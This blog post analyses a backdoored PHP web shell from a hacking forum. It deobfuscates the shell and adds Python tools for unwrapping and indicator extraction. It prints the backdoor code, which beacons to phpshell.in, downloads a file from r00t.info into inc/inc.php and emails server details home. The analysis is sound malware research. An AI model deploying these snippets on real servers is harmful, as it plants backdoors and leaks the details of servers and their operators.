For every wannabe hacker out there, there is a veritable cornucopia of premade tools and utilities that let someone with zero knowledge of anything hit a few buttons and potentially breach a website, and there is always a more experienced hacker waiting for the wannabe to pick up an infected or backdoored tool.

@CryptoCypher recently did a rather shameless plug (:P) for a forum he moderates on a Discord server I am a member of.

I decided to check things out and most of it was 'alright', however something caught my eye.

One

A now-deleted post about a "Godaddy Secureserver bypass shell" (whatever the hell that is).

The post embedded a bit of PHP code that had been 'obfuscated' (and I say obfuscated lightly).

From the header comment in the PHP it is quite plain to see that the code had been obfuscated using FOPO (Free Online PHP Obfuscator). The obfuscation FOPO applies is pretty straightforward: the real code is encoded (base64 and friends) and handed to eval() through a chain of decode calls, so peeling those layers back gives you the plaintext. There are several tools online which are able to deobfuscate FOPO output.
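As an added illustration of how peeling such a wrapper works (this is not code from the post, nor from FOPO or any existing deobfuscator), here is a small Python unwrapper: it resolves decoder names that were stashed in variables as hex-escaped strings, finds eval(chain('literal')), applies the PHP decode functions in the order PHP would, and repeats until plain code is left. The two-layer sample it builds for itself is constructed for the demo and only mimics the style of these wrappers; it is not real FOPO output, and the payload line is a constructed stand-in for the shell's beacon.

```python
import base64
import codecs
import re
import zlib

# Python equivalents of the PHP decode functions these wrappers chain together.
# PHP's gzinflate() is raw DEFLATE; gzuncompress() is zlib-framed.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b),
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),
    "gzuncompress": lambda b: zlib.decompress(b),
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# $name = "...";  (double-quoted, may carry \xNN / \NNN escapes hiding a function name)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"((?:\\.|[^"\\])*)"\s*;')
# eval( f1( f2( ... 'literal' ) ) );  -> group 1 is the call chain, group 3 the literal
EVAL_RE = re.compile(r"""eval\s*\(\s*((?:\w+\s*\(\s*)+)(['"])([^'"]*)\2\s*\)+\s*;""")


def php_unescape(s: str) -> str:
    """Resolve the \\xNN and \\NNN escapes of a PHP double-quoted string."""
    s = re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), s)


def resolve_aliases(src: str) -> str:
    """Rewrite $v(...) into base64_decode(...) etc. when $v was assigned a decoder name."""
    for m in ASSIGN_RE.finditer(src):
        name = php_unescape(m.group(2))
        if name in DECODERS:
            src = re.sub(r"\$" + re.escape(m.group(1)) + r"\s*\(", name + "(", src)
    return src


def unwrap_once(src: str):
    """Decode the first eval() wrapper found; return the inner source, or None if none."""
    src = resolve_aliases(src)
    m = EVAL_RE.search(src)
    if m is None:
        return None
    data = m.group(3).encode("latin-1")
    for fn in reversed(re.findall(r"\w+", m.group(1))):  # innermost PHP call runs first
        if fn not in DECODERS:
            raise ValueError(f"unhandled decoder in eval chain: {fn}")
        data = DECODERS[fn](data)
    return data.decode("latin-1")


def unwrap(src: str, max_layers: int = 20):
    """Peel eval layers until plain code remains; returns (code, layers_removed)."""
    layers = 0
    while layers < max_layers:
        inner = unwrap_once(src)
        if inner is None:
            break
        src, layers = inner, layers + 1
    return src, layers


def _deflate_raw(b: bytes) -> bytes:
    """Raw DEFLATE, i.e. what PHP's gzdeflate() produces and gzinflate() consumes."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return c.compress(b) + c.flush()


def build_sample(payload: str) -> str:
    """Constructed two-layer wrapper in the style of these obfuscators (not real FOPO output)."""
    # inner layer: eval(str_rot13(gzinflate(base64_decode('...'))))
    lit1 = base64.b64encode(_deflate_raw(codecs.encode(payload, "rot13").encode("latin-1"))).decode()
    layer1 = f"eval(str_rot13(gzinflate(base64_decode('{lit1}'))));"
    # outer layer: the decoder name hidden as a hex-escaped string in a variable
    hexname = "".join(f"\\x{ord(c):02x}" for c in "base64_decode")
    lit2 = base64.b64encode(layer1.encode("latin-1")).decode()
    return f'<?php\n$kE = "{hexname}";\neval($kE("{lit2}"));\n?>'


# Constructed stand-in for the shell's first beacon line; the base64 is the real
# one quoted in the post (http://phpshell.in/l-), the rest is simplified.
PAYLOAD = "$x = base64_decode('aHR0cDovL3BocHNoZWxsLmluL2wt') . GetIP(); @file_get_contents($x);"

if __name__ == "__main__":
    code, n = unwrap(build_sample(PAYLOAD))
    print(f"removed {n} layer(s):\n{code}")
```

The unwrapper never executes anything: it only recognises a fixed set of decode functions, so a layer that calls something else raises instead of silently producing garbage, which is the behaviour you want when the sample is hostile.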

The deobfuscated sample follows (I'm not posting it here in case this site gets flagged for hosting malware...):

https://ghostbin.com/paste/43349

Let's see what is crack'in.

The first several dozen lines look normal for a shell, but this catches my eye:

<?php
// Returns the address of whoever is requesting the shell page. HTTP_CLIENT_IP and
// HTTP_X_FORWARDED_FOR are just request headers, so the requester can put anything
// there; only REMOTE_ADDR comes from the actual TCP connection.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } elseif (getenv("HTTP_X_FORWARDED_FOR")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
        if (strstr($ip, ',')) {
            $tmp = explode(',', $ip);
            $ip  = trim($tmp[0]);
        }
    } else {
        $ip = getenv("REMOTE_ADDR");
    }
    return $ip;
}
// Beacon URL: http://phpshell.in/l-<requester IP>-<base64 of the shell's own URL>
$x = base64_decode('aHR0cDovL3BocHNoZWxsLmluL2wt') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
// Request it with curl, falling back to file_get_contents() if curl is missing or fails
if (function_exists('curl_init')) {
    $ch = @curl_init();
    curl_setopt($ch, CURLOPT_URL, $x);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $gitt = curl_exec($ch);
    curl_close($ch);
    if ($gitt == false) {
        @$gitt = file_get_contents($x);
    }
} elseif (function_exists('file_get_contents')) {
    @$gitt = file_get_contents($x);
}
?>

So in a sandbox I run the following code to see what curl or file_get_contents is downloading:

<?php
// Same GetIP() as in the shell. Run this under a web server in the sandbox so that
// $_SERVER['HTTP_HOST'] and $_SERVER['REQUEST_URI'] are populated, and print the
// beacon URL instead of requesting it.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } elseif (getenv("HTTP_X_FORWARDED_FOR")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
        if (strstr($ip, ',')) {
            $tmp = explode(',', $ip);
            $ip  = trim($tmp[0]);
        }
    } else {
        $ip = getenv("REMOTE_ADDR");
    }
    return $ip;
}
$x = base64_decode('aHR0cDovL3BocHNoZWxsLmluL2wt') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
print($x);

So what the shell is trying to fetch is http://phpshell.in/l-127.0.0.1-aHR0cDovLzEyNy4wLjAuMS9zaGVsbC5waHA=. The trailing blob, aHR0cDovLzEyNy4wLjAuMS9zaGVsbC5waHA=, decodes to http://127.0.0.1/shell.php, the shell's own URL in my sandbox. The 127.0.0.1 in the middle is GetIP(), i.e. the address of whoever is requesting the shell page (REMOTE_ADDR, or whatever the requester put in X-Forwarded-For / Client-IP), so in the field that is the operator's address rather than the server's. Since the URL returns nothing (I tried using a DigitalOcean droplet in the event phpshell.in didn't like localhost), I'm guessing that function serves solely to log who is using the shell and where it is installed.

Interesting backdoor: hackers piggybacking on other hackers. However, continue down the code and this crops up between lines 231 and 265 of the paste: $retValue = file_get_contents(base64_decode("aHR0cDovL3BocHNoZWxsLmluL2wt") . "=" . $lld . base64_decode("JmI=") . "=" . $brow);. Once again aHR0cDovL3BocHNoZWxsLmluL2wt decodes to http://phpshell.in/l-, and JmI= decodes to &b, so the request is http://phpshell.in/l-=<shell URL>&b=<user agent>.

I'm not going to dwell on this one because it does the same as the call above: $lld is 'http://' . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"], the shell's own URL again. The only difference is that the browser's User-Agent is now sent along as well, via $brow = urlencode($_SERVER['HTTP_USER_AGENT']);.

So... 2 backdoors... Ok....

Further down this catches my eye again:

@mkdir("inc");
// Download lamer.txt from r00t.info and drop it as inc/inc.php next to the shell
$dos  = file_get_contents("http://r00t.info/txt/lamer.txt");
$data = "inc/inc.php";
@touch("inc/inc.php");
$ver = @fopen($data, 'w');
@fwrite($ver, $dos);
@fclose($ver);
// Then mail the shell's URL and the dropped file's path home. The Turkish strings:
// "Sender Yazdirildi" = "Sender written", "SITE YOL" = "site path",
// "Sender Yolu" = "sender path", "Hacklink Bildiri" = "hacklink notification".
// ($header is appended to without ever being initialised; PHP just warns and carries on.)
$yol = "http://" . $_SERVER['HTTP_HOST'] . "" . $_SERVER['REQUEST_URI'] . "";
$y   = '<h1>Sender Yazdirildi.<br/> SITE YOL : ' . $yol . '<br/>Sender Yolu : inc/inc.php</h1>';
$header .= "From: SheLL Boot <[email protected]>\n";
$header .= "Content-Type: text/html; charset=utf-8\n";
@mail("[email protected]", "Hacklink Bildiri", "$y", $header);
@mail("[email protected]", "Hacklink Bildiri", "$y", $header);

Ok so now it is downloading lamer.txt from r00t.info, writing it to inc/inc.php next to the shell (the message body calls the dropped file the "Sender"), then emailing the shell's URL and the path of the dropped file to [email protected]... Twice... Guess he really wanted to make sure he got the email!

lamer.txt is here out of interest: https://ghostbin.com/paste/wesg2

Directly below that code is this gem:

// Turkish: $kime = "to whom" (recipient), $baslik = "subject"; the subject reads
// "r00t.info Server Hunter V1.0". "Dosya Yolu" = "file path",
// "Server isletim sistemi" = "server operating system", "Avlanan Site" = "hunted site".
$kime        = "[email protected]";
$baslik      = "r00t.info Server Avcisi V1.0";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
$EL_MuHaMMeD .= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
$EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
$EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
$EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);

Ok he REALLY wanted to ensure he got the server info.
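Rather than tripping each call-home in a sandbox one at a time, the indicators in the four snippets above (outbound URLs, including the ones assembled from base64 fragments, mail() recipients, the $_SERVER fields being harvested, and the drop to disk) can be pulled out statically. The following Python triage script is an added example, not from the post or from any existing tool: it runs over a constructed composite of the snippets quoted above, with the redacted mailboxes replaced by placeholder addresses, and its regexes are deliberately simple (string literals and simple assignments only, no real PHP parsing), so a sample that builds its strings more creatively would need more work.

```python
import base64
import re

# base64_decode('...') / base64_decode("...") with a literal argument
B64_CALL_RE = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""")
URL_RE = re.compile(r"""https?://[\w.-]+(?:/[^\s'"<>]*)?""")
# first argument of mail(): either a $variable or a quoted literal
MAIL_RE = re.compile(r"""\bmail\(\s*(\$\w+|(['"])[^'"]*\2)""")
STR_ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*(['"])([^'"]*)\2\s*;""")
SERVER_KEY_RE = re.compile(r"""\$_SERVER\[\s*['"](\w+)['"]\s*\]""")
WRITE_RE = re.compile(r"\b(?:fwrite|fputs|file_put_contents)\s*\(")


def decode_b64_literals(src: str) -> dict:
    """Map each base64_decode('...') literal to its plaintext when it is printable ASCII."""
    found = {}
    for _quote, lit in B64_CALL_RE.findall(src):
        try:
            raw = base64.b64decode(lit, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if raw and all(32 <= b < 127 for b in raw):
            found[lit] = raw.decode("ascii")
    return found


def extract_iocs(src: str) -> dict:
    """Static triage: URLs, mail recipients, harvested $_SERVER keys, local file writes."""
    decoded = decode_b64_literals(src)
    # Substitute the decoded text back in so URLs built from base64 fragments
    # become visible to the plain URL regex.
    expanded = B64_CALL_RE.sub(
        lambda m: "'" + decoded[m.group(2)] + "'" if m.group(2) in decoded else m.group(0),
        src,
    )
    strings = {name: val for name, _quote, val in STR_ASSIGN_RE.findall(expanded)}
    mail_to = set()
    for arg, _quote in MAIL_RE.findall(expanded):
        if arg.startswith("$"):
            mail_to.add(strings.get(arg[1:], arg))  # unresolved -> keep the variable name
        else:
            mail_to.add(arg[1:-1])
    return {
        "urls": sorted(set(URL_RE.findall(expanded))),
        "mail_to": sorted(mail_to),
        "server_keys": sorted(set(SERVER_KEY_RE.findall(src))),
        "writes_local_file": WRITE_RE.search(src) is not None,
    }


# Constructed composite of the call-home snippets quoted in the post; the real,
# redacted mailboxes are replaced with placeholder addresses.
SAMPLE = r"""<?php
$x = base64_decode('aHR0cDovL3BocHNoZWxsLmluL2wt') . GetIP() . '-' . base64_encode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$retValue = file_get_contents(base64_decode("aHR0cDovL3BocHNoZWxsLmluL2wt") . "=" . $lld . base64_decode("JmI=") . "=" . $brow);
@mkdir("inc");
$dos = file_get_contents("http://r00t.info/txt/lamer.txt");
$ver = @fopen("inc/inc.php", 'w');
@fwrite($ver, $dos);
@mail("owner-one@example.invalid", "Hacklink Bildiri", "$y", $header);
$kime = "owner-two@example.invalid";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
?>"""

if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE).items():
        print(f"{key}: {value}")
```

The output is the list you would hand to whoever is hunting these on a hosting estate: block or sinkhole the two hosts, and alert on outbound mail from web workers to the collected recipients. Note that `'http://' . $_SERVER['HTTP_HOST']` is deliberately not reported as a URL, since it is the victim's own address rather than an attacker endpoint.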

So a total of 4 backdoors...

Personally I don't care what happens to the morons who download these tools to intentionally do harm, but it is interesting to see just how risky it really is for said wannabe morons.